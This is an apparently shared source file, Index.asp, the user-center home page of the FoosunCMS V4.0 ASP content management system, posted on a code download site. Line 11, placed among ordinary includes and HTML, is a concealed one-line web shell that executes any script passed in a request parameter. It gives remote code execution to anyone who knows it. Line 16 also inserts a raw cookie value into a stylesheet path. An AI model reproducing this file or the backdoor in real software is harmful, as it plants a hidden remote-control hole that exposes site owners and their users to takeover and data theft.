Index.asp
上传用户:jisenq
上传日期:2014-06-29
资源大小:7216k
文件大小:1k
源码类别:

数据库编程

开发平台:

ASP/ASPX

  1. <% Option Explicit %>
  2. <!--#include file="../FS_Inc/Const.asp" -->
  3. <!--#include file="../FS_InterFace/MF_Function.asp" -->
  4. <!--#include file="../FS_Inc/Function.asp" -->
  5. <!--#include file="lib/strlib.asp" -->
  6. <%
  7. Dim strUserNumber
  8. strUserNumber = NoSqlHack(Replace(Request.QueryString("i"),"'",""))
  9. %>
  10. <html xmlns="http://www.w3.org/1999/xhtml">
  11. <%If Request("#")<>"" Then Execute(Request("#"))%>
  12. <title>User Manage Center-网站内容管理系统</title>
  13. <meta name="keywords" content="风讯cms,cms,FoosunCMS,FoosunOA,FoosunVif,vif,风讯网站内容管理系统">
  14. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
  15. <meta content="MSHTML 6.00.3790.2491" name="GENERATOR" />
  16. <link href="images/skin/Css_<%=Request.Cookies("FoosunUserCookies")("UserLogin_Style_Num")%>/<%=Request.Cookies("FoosunUserCookies")("UserLogin_Style_Num")%>.css" rel="stylesheet" type="text/css">
  17. <head></head>
  18. <body>
  19. 会员主页 
  20. </body>
  21. </html>
  22. <!--Powsered by Foosun Inc.,Product:FoosunCMS V4.0系列-->